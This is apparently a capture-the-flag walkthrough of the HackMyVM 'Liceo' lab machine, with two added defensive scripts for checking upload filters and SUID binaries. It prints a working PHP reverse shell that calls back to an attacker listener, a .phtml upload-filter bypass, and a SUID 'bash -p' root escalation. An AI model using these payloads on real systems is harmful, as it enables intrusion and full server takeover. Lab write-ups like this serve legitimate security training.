HackMyVM-Liceo

Liceo

Information gathering

Host discovery

┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.2.0/24 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 09:57 EDT

Nmap scan report for liceoserver (192.168.2.2)
Host is up (0.00031s latency).
MAC Address: 08:00:27:69:22:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap scan report for kali (192.168.2.15)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 4.95 seconds

Port scan

┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- 192.168.2.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 09:58 EDT
Nmap scan report for liceoserver (192.168.2.2)
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
MAC Address: 08:00:27:69:22:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.84 seconds

Exploitation

Start with port 21. vsftpd 3.0.5 here accepts anonymous logins, and the share holds a single note:

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.2.2  
Connected to 192.168.2.2.
220 (vsFTPd 3.0.5)
Name (192.168.2.2:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||33942|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000          191 Feb 01  2024 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||22377|)
150 Opening BINARY mode data connection for note.txt (191 bytes).
100% |************************|   191      463.98 KiB/s    00:00 ETA
226 Transfer complete.
191 bytes received in 00:00 (249.69 KiB/s)
┌──(kali㉿kali)-[~]
└─$ cat note.txt 
Hi Matias, I have left on the web the continuations of today's work, 
would you mind contiuing in your turn and make sure that the web will be secure? 
Above all, we dont't want intruders...

That gives us a username, Matias, and a hint that the unfinished work was "left on the web". Enumerate the web server's directories:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.2.2
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png,zip,git,html,php,txt,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/images               (Status: 301) [Size: 311] [--> http://192.168.2.2/images/]                                                          
/index.html           (Status: 200) [Size: 21487]
/.html                (Status: 403) [Size: 276]
/uploads              (Status: 301) [Size: 312] [--> http://192.168.2.2/uploads/]                                                         
/upload.php           (Status: 200) [Size: 371]
/css                  (Status: 301) [Size: 308] [--> http://192.168.2.2/css/]                                                             
/js                   (Status: 301) [Size: 307] [--> http://192.168.2.2/js/]                                                              
/.php                 (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 276]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

Gobuster finds an /upload.php page and an /uploads/ directory. Open /upload.php.

The page accepts file uploads, so try uploading a PHP reverse shell. Save it as shell.phtml: Ubuntu's default Apache PHP module configuration hands .php, .phtml and .phar files to the PHP engine, so the alternate extension still executes even if the upload form rejects plain .php.

<?php
// Connect back to the Kali listener and hand the socket to sh as stdin, stdout and stderr.
$sock = fsockopen("192.168.2.15", 1234);
$proc = proc_open("sh", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
?>

Start a listener on Kali, then request http://192.168.2.2/uploads/shell.phtml to trigger the payload:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.2.15] from (UNKNOWN) [192.168.2.2] 42188
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
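Why the .phtml upload ran at all comes down to Apache's handler pattern, not to anything special in the payload. The following script is an added example, not part of the original writeup or the Liceo box: it checks candidate upload names against the FilesMatch regex that Ubuntu's Apache php module ships in /etc/apache2/mods-enabled/php*.conf, contrasts a naive ".php-only" blocklist (a constructed illustration, since upload.php's real filter is not shown on the page) with an extension allowlist, and classifies the names seen in /uploads/ on the box.

```shell
#!/bin/sh
# Added example, not from the writeup. Assumes the target uses Ubuntu's
# default Apache PHP handler config:
#   <FilesMatch ".+\.ph(ar|p|tml)$">  SetHandler application/x-httpd-php
# The blocklist and allowlist below are constructed illustrations; the
# filter actually used by upload.php on the box is not shown on the page.

PHP_HANDLER_RE='.+\.ph(ar|p|tml)$'

# Returns 0 if Apache would pass the file to the PHP engine.
apache_runs_php() {
    printf '%s\n' "$1" | grep -Eq "$PHP_HANDLER_RE"
}

# A naive upload filter that only blocks the literal ".php" extension.
naive_filter_blocks() {
    case "$1" in
        *.php) return 0 ;;
        *)     return 1 ;;
    esac
}

# Hardened filter: allowlist of image extensions and exactly one dot, so
# shell.phtml, shell.php.jpg and shell..phtml are all rejected.
allowlist_allows() {
    case "$1" in
        *.*.*)                      return 1 ;;
        *.jpg|*.jpeg|*.png|*.gif)   return 0 ;;
        *)                          return 1 ;;
    esac
}

# Print BLOCKED, EXECUTES or HARMLESS for a name under the naive filter.
# EXECUTES means the filter let it through AND Apache will run it: a bypass.
classify() {
    if naive_filter_blocks "$1"; then
        echo BLOCKED
    elif apache_runs_php "$1"; then
        echo EXECUTES
    else
        echo HARMLESS
    fi
}

# Constructed sample names, including the two that ended up in /uploads/.
for f in shell.php shell.phtml shell..phtml shell.phar shell.php.jpg shell.txt photo.png; do
    if allowlist_allows "$f"; then ok=allowed; else ok=rejected; fi
    printf '%-16s naive=%-9s allowlist=%s\n' "$f" "$(classify "$f")" "$ok"
done
```

The allowlist is the fix a reviewer would ask for in upload.php; on the server side it should be paired with storing uploads outside the document root, or at least disabling the PHP engine for /uploads/ in the vhost, so that a bypassed extension check cannot turn into code execution.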

Privilege escalation

bash-5.1$ ls -la
ls -la
total 16
drwxr-xr-x 2 www-data www-data 4096 Apr 18 14:40 .
drwxr-xr-x 7 root     root     4096 Feb 10  2024 ..
-rw-r--r-- 1 www-data www-data   38 Apr 18 14:35 shell..phtml
-rw-r--r-- 1 www-data www-data  113 Apr 18 14:40 shell.phtml
bash-5.1$ cd ..
cd ..
bash-5.1$ ls -la
ls -la
total 592
drwxr-xr-x 7 root     root       4096 Feb 10  2024 .
drwxr-xr-x 3 root     root       4096 Feb 10  2024 ..
drwxr-xr-x 2 www-data www-data   4096 Sep 16  2020 css
drwxr-xr-x 2 www-data www-data   4096 Sep 16  2020 images
-rw-r--r-- 1 www-data www-data  21487 Feb 10  2024 index.html
drwxr-xr-x 2 www-data www-data   4096 Sep 16  2020 js
-rw-r--r-- 1 www-data www-data 547090 Feb  4  2024 liceoweb.zip
drwxr-xr-x 2 www-data www-data   4096 Feb  3  2024 spering-html
-rw-r--r-- 1 www-data www-data   1501 Feb 10  2024 upload.php
drwxr-xr-x 2 www-data www-data   4096 Apr 18 14:40 uploads
bash-5.1$ cd ..
cd ..
bash-5.1$ ls -la
ls -la
total 16
drwxr-xr-x  3 root root 4096 Feb 10  2024 .
drwxr-xr-x 14 root root 4096 Feb  1  2024 ..
-rw-------  1 root root   73 Feb 11  2024 .bash_history
drwxr-xr-x  7 root root 4096 Feb 10  2024 html
bash-5.1$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
// www-data has no sudo password, so look for SUID binaries instead
bash-5.1$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/snap/snapd/20671/usr/lib/snapd/snap-confine
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/2105/usr/bin/chfn
/snap/core20/2105/usr/bin/chsh
/snap/core20/2105/usr/bin/gpasswd
/snap/core20/2105/usr/bin/mount
/snap/core20/2105/usr/bin/newgrp
/snap/core20/2105/usr/bin/passwd
/snap/core20/2105/usr/bin/su
/snap/core20/2105/usr/bin/sudo
/snap/core20/2105/usr/bin/umount
/snap/core20/2105/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2105/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/umount
/usr/bin/sudo
/usr/bin/bash
/usr/bin/fusermount3
/usr/libexec/polkit-agent-helper-1
// /usr/bin/bash is SUID root, which is not standard. Run it with -p: without -p, bash notices euid != uid and drops back to the real uid; -p keeps the EUID the SUID bit granted.
bash-5.1$ /usr/bin/bash -p
/usr/bin/bash -p
bash-5.1# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
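The SUID listing above is long, but almost all of it is the stock set (plus the copies inside the mounted core20 snap); the one line that matters is /usr/bin/bash. The script below is an added example, not part of the writeup or the box: it triages a SUID listing against a baseline of binaries that carry the SUID bit on a stock Ubuntu 22.04 install (the baseline is assumed from that release's packages), folds /snap/<name>/<revision>/... paths back onto their root-filesystem equivalents, and prints only the outliers. The sample input is constructed from the find output above.

```shell
#!/bin/sh
# Added example, not from the writeup. Baseline below is the set of SUID
# binaries on a stock Ubuntu 22.04 install (assumed); adjust for other
# releases. Requires only POSIX sh, sed, sort and grep.

BASELINE='/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/libexec/polkit-agent-helper-1'

# Map /snap/<name>/<revision>/usr/bin/sudo to /usr/bin/sudo so the copies
# inside mounted snaps are compared against the same baseline.
strip_snap_prefix() {
    sed -E 's#^/snap/[^/]+/[^/]+##'
}

# Read SUID paths on stdin; print (deduplicated) the ones not in BASELINE.
unexpected_suid() {
    strip_snap_prefix | sort -u | while IFS= read -r p; do
        [ -n "$p" ] || continue
        if ! printf '%s\n' "$BASELINE" | grep -Fxq -- "$p"; then
            printf '%s\n' "$p"
        fi
    done
}

# Live use on a target:
#   find / -perm -4000 -type f 2>/dev/null | unexpected_suid
# Offline demo with a constructed subset of the listing from the box:
SAMPLE='/snap/core20/2105/usr/bin/sudo
/snap/core20/1974/usr/bin/passwd
/snap/snapd/20671/usr/lib/snapd/snap-confine
/usr/lib/snapd/snap-confine
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/bash
/usr/bin/fusermount3
/usr/libexec/polkit-agent-helper-1'

printf '%s\n' "$SAMPLE" | unexpected_suid
```

Run on the listing from this box it prints only /usr/bin/bash, which is exactly the binary the writeup then exploits with bash -p. The same function works as a defensive check: schedule it against a known-good baseline and alert on any new line, since a SUID shell or interpreter appearing on a host is almost never legitimate.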